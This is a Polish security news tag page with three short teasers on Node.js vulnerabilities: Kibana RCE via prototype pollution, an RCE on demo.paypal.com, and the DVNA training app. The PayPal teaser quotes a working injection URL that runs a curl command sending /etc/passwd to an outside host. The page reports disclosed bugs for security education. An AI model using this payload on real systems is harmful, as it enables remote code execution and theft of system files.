Tag: node.js

RCE w aplikacji opartej o Node.js (Kibana & Prototype Pollution & CVE-2019-7609)

16 października 2019, 20:30 | W biegu | 1 komentarz
RCE w aplikacji opartej o Node.js (Kibana & Prototype Pollution & CVE-2019-7609)

Historia zaczęła się od niewinnego maila uczestnika jednego z naszych szkoleń hej, mam tu taką fajną podatność – jest Node.js i Kibanę, może fajnie byłoby pokazać jak tu realnie wykonać dowolny kod na systemie operacyjnym? Michał Bentkowski stwierdził: challenge accepted, szczególnie że cała sprawa wiązała się z dość mało znaną…

Czytaj dalej »

Node.js – wykonanie kodu w OS na serwerze Paypala

20 sierpnia 2016, 10:20 | W biegu | komentarze 3

O problemach bezpieczeństwa w node.js pisaliśmy już jakiś czas temu. Teraz świeży bug umożliwiający wykonanie kodu w os na demo.paypal.com. Tym razem udało się znaleźć problem przy okazji fuzzingu w burpie: Finalnie exploit okazał się w miarę prosty (wysłanie /etc/passwd do serwera atakującego): https://demo.paypal.com/demo/navigation?device[]=x&device[]=y’-require(‚child_process’).exec(‚curl+-F+”x=cat+/etc/passwd„+artsploit.com’)-‚ –Michał Sajdak

Czytaj dalej »

Cholernie dziurawa aplikacja w node.js

24 grudnia 2015, 12:20 | W biegu | komentarze 3

O bezpieczeństwie node.js pisaliśmy jakiś czas temu. Zainteresowanych tematem polecam projekt: DVNA (Damn Vulnerable Node Application) – czyli specjalnie podatną aplikacją przygotowaną w node.js (oczywiście na potrzeby ćwiczenia poszukiwania podatności – na realnym celu…). –ms

Czytaj dalej »